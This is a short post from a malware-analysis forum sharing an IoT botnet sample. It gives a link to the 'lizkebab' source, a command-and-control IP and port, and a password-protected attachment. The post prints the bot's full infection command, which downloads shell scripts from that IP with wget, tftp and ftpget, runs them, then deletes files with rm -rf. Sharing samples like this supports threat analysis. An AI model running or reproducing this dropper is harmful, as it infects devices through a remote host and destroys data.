A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #29391  by jioushizhu
 Tue Oct 11, 2016 4:42 am
https://github.com/gh0std4ncer/lizkebab
46.165.253.13:4574 ok
cd /tmp || cd /var/system || cd /mnt || cd /root || cd /; busybox wget http://46.165.253.13/IoT.sh; chmod 777 IoT.sh; sh IoT.sh; tftp 46.165.253.13 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 46.165.253.13; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 46.165.253.13 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf IoT.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *\r\n
Attachments
pass:infected
(630.83 KiB) Downloaded 49 times